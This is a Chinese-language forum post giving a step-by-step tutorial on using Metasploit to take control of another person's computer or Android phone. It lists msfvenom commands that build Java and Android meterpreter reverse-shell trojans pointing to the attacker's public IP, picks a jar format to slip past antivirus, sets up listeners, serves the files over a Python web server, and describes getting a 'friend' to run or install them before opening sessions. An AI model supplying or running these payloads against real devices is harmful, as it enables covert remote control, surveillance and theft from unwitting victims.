无名商城论坛

搜索
查看: 585|回复: 0

[TSD/原创] [HK]利用msf控制别人手机或者电脑

[复制链接]

1万

主题

1万

帖子

3万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
32464
发表于 2022-5-8 19:38:43 | 显示全部楼层 |阅读模式
  大家,我是hk小白,我只是一个小白可称为白中白,好了教程开始。
  这个就有点类似于拿到命令执行漏洞,在对方机器上反弹shell一样。

此处为给朋友做演示,直接给他发一个马让他执行,来看看我们可以做什么。

首先需要一台公网服务器。(别问为什么)
1.生成木马
为防止exe文件被杀软杀掉,我们生成一个jar的马。(前提是对方机器有java环境)

1.1电脑
LHOST中填写你的公网IP,LPORT填写端口(随意哪个,不要80)
指令
msfvenom -p java/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2121 W>a.jar

1.2安卓手机
同理,命令换成
msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2121 R > a.apk

2.开启监听
好了,此时我们先去开启监听。

首先打开你的msf。kali下输入命令msfconsole。

2.1 电脑
然后开启监听:(-H后为你的公网IPhandler -p java/meterpreter/reverse_tcp -H xx.xx.xx.xx -P 2121)

2.2手机
监听命令换为
handler -p android/meterpreter/reverse_tcp -H xx.xx.xx.xx -P 2121

3.发送并执行木马
将上一步生成好的木马之后发给你的朋友,或者直接让他下下来,利用python快速开启一个http服务。(8080为指定端口,你指定其他也可以
python -m SimpleHTTPServer 8080

3.1电脑
然后把地址发给对方。
本帖隐藏的内容需要【资源会员】才可浏览,您需要升级才可浏览,点击这里升级【资源会员】
并让对方执行。
在他执行的一瞬间,你就看到这边已经弹回来了。

查看sessions

sessions
进入会话(序号是几就按几)

sessions 1

3.2 手机
让对方安装apk就好了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表